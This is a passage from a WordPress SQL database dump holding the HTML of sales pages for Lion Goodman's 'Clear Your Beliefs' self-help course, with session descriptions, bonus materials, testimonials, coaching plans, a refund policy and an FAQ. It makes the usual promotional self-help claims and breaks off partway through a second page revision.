size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 20:07:36', '2014-06-18 01:07:36', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(984, 2, '2014-06-17 20:10:16', '2014-06-18 01:10:16', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" 